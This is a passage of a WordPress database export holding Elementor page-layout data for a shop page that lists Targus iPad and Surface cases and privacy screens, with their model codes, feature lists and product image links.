warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e704695\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"39b318b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"df3be40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ba13e6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe249f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"278724c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"027329b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"054db58\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c6196c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"39f71bf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"208ace1\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"dd3ee9d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"26b4f3b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu Signature <\\/strong><strong>12.9-inch\\u00a0<\\/strong><strong> iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ750GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4a121f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"674bee1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>SafePort Rugged <\\/strong><strong>Case for <\\/strong><strong>12.9-inch iPad <\\/strong><strong>(6th gen. \\/ 5th gen.)<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD138GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2bed517\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aae738f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6a9f2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0050377_versavu-signature-series-case-for-129-in-ipad-pro-2018-black_grande.jpg?v=1571711590\\\" alt=\\\"VersaVu\\u00ae Signature Series Case for iPad Pro\\u00ae (12.9-inch) 3rd gen. - Black\\\" width=\\\"190\\\" height=\\\"190\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a7759bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c62f212\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/3_THD138GLZ_BACK2_1024x1024.jpg?v=1571711592\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cb966a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ba550a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6da4bbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Passes military grade 4\\u2019 drop testing* for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\u00ae\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4bdd233\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6c9e329\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Heavy duty, shock-absorbing case for the iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch)<\\/li><li>Form-fit TPU shell with USA Military-Spec drop protection \\u2013 protects your device from 1.2m\\/4ft drops<\\/li><li>Offers rugged protection in a slim, professional-looking case<\\/li><li>Sound enhancing scoops for all iPad speakers<\\/li><li>Integrated stand for stable viewing and comfortable typing<\\/li><li>Optional detachable shoulder strap (THA101GLZ)<\\/li><li>Compatible with the ambient light sensor and mic on your device<\\/li><li>Clear window on back to display asset tag<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b71a0e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26da7ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7094b67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c542f72\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3243ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d729ea6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"60d35e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"84813a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"46d1844\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"5da049f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7ac39cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ779GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f231dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"db2432a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Protect Case for Microsoft Surface\\u2122 Go<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THD491GLZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8dc8da\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1953aa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ac8efa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ779GL_11_PEN2_1024x1024.jpg?v=1571711592\\\" width=\\\"193\\\" height=\\\"193\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"398b7f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2b1f7b7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THD491GL_20_USE4_1024x1024.jpg?v=1571711592\\\" width=\\\"192\\\" height=\\\"192\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b76d24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"84599d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b02e1d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Non-slip interior for infinite viewing angles<\\/li><li>Integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"56f840c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"829e6ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black<\\/li><li>Case passes military grade 4\\u2019 drop testing (MIL-STD 810G)*<\\/li><li>Hard-moulded tray with durable kickstand<\\/li><li>Advanced corner protection with shock-absorbent TPU<\\/li><li>Keyboard locking feature helps prevent accidental disconnects (keyboard not included)<\\/li><li>Detachable hand strap (included) and integrated Surface Pen holder (pen not included)<\\/li><li>Compatible with Surface Type Cover<\\/li><li>Compatible with Surface Dock<\\/li><li>Full access to camera and ports<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a6b2856\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"33e8d3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d4063c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2ef704\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"61e6c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da0626d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a354cbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8006a3f\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2cda527\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"12faef0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3eb43c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Screen\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6314953\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"78877de\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"468758b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Apple Macbook<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b6689d9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1e7d8da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"6e8f169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0049031_magnetic-privacy-screen-for-133-macbook-2017_ebc5f6e1-9646-4840-9ef4-6441c94ae069_grande.jpg?v=1571711592\\\" alt=\\\"Magnetic Privacy Screen for 13.3\\\" width=\\\"274\\\" height=\\\"274\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"61fa17e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7efc979\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Magnetic Privacy Screen for Apple MacBook<\\/strong><\\/h2><ul id=\\\"product-features\\\"><li>Protect your on-screen data, Privacy Screens block angled viewing from prying eyes<\\/li><li>Magnetic screens easy to attach, remove and reattach. No tools, no adhesives, no installation required<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Available\\u00a0 for :-<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>MacBook 12-inch\\u00a0 (ASM12MBGL)<\\/h4><\\/li><li><h4>MacBook 13.3-inch (ASM133MBP6GL)<\\/h4><\\/li><li><h4>MacBook Air 13.3-inch (ASM133MBA7GL)<\\/h4><\\/li><li><h4>MacBook 15.4-inch (ASM154MBGL)<\\/h4><\\/li><li><h4>MacBook Pro 15.4-inch (ASM154MBP6GL)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d9f0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"08b3411\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"524d5be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e7590b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"975bc53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05e81b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83489ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ae0925b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ffd343a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Microsoft Surface<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e15e040\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9454e78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"95d0520\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\\\" alt=\\\"Privacy Screen Microsoft Surface Pro 4 (12.3\\\" width=\\\"215\\\" height=\\\"215\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7666383\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"da26715\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">\\u00a0Microsoft Surface Pro 4 (12.3\\\") - Clear<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for the\\u00a0Microsoft Surface Pro 4 (12.3\\\") tablet<\\/li><li>Works with touch screen<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\\\"https:\\/\\/uk.targus.com\\/pages\\/keep-your-business-your-business\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><u><br \\/><\\/u><\\/a><\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1cbe15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"182a368\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd7176c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48594a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8dd9cb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff73127\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99d1e23\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"868d42c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f0f8ace\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Laptop<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"26653f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7b30821\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"53def41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 11.6\\\" width=\\\"307\\\" height=\\\"307\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8342f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"76157d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for tablet, laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 11.6\\\"W 16:9 - (ASF116W9EU)<\\/h4><\\/li><li><h4>Screen 12.1\\\"W 16:10 - (ASF121WEU)<\\/h4><\\/li><li><h4>Screen 12.5\\\"W 16:9 - (ASF125W9EU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:10 - (ASF133WEU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:9 - (ASF133W9EU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:10 - (ASF141WEU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:9 - (ASF141W9EU)<\\/h4><\\/li><li><h4>Screen 14\\u201d W 16:9 - (ASF14W9EU)<\\/h4><\\/li><li><h4>Screen 15.4\\\"W 16:10 - (ASF154WEU)<\\/h4><\\/li><li><h4>Screen 15.6\\\"W 16:9 - (ASF156W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e074c0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b967aae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d7859f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf78a0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e7dda\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dcf0830\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9b6734e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a21cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ccba5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Monitor<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8be1a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a283150\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"485c58c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 17\\\" width=\\\"269\\\" height=\\\"269\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70e84b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"05a0a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 17\\\" 4:3 - (ASF170EU)<\\/h4><\\/li><li><h4>Screen 19\\\" 4:3 - (ASF190EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 16:10 - (ASF19WEU)<\\/h4><\\/li><li><h4>Screen 21.5\\\"W 16:9 - (ASF215W9EU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:10 - (ASF220WEU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:9 - (ASF22W9EU)<\\/h4><\\/li><li><h4>Screen 23\\\"W 16:9 - (ASF23W9EU)<\\/h4><\\/li><li><h4>Screen 23.8\\\"W 16:9 - (ASF238W9EU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:10 - (ASF24WEU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:9 - (ASF24W9EU)<\\/h4><\\/li><li><h4>Screen 27\\\"W 16:9 - (ASF27W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a1a9a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"058d29d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d3d9795\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8950,3686,'_elementor_controls_usage','a:5:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:148;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:148;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:168;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:3:{s:12:\"_inline_size\";i:140;s:16:\"content_position\";i:8;s:5:\"align\";i:8;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:78;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:16:\"content_position\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:50;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:12;s:16:\"background_color\";i:1;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:16;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:16;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:3:{s:5:\"title\";i:4;s:11:\"header_size\";i:4;s:5:\"align\";i:4;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:1:{s:11:\"title_color\";i:4;}}}}}'),(8936,3702,'_elementor_css','a:5:{s:4:\"time\";i:1573020222;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8949,3704,'_elementor_css','a:5:{s:4:\"time\";i:1573020814;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8946,3704,'_elementor_template_type','wp-page'),(8947,3704,'_elementor_version','2.7.4'),(8948,3704,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" 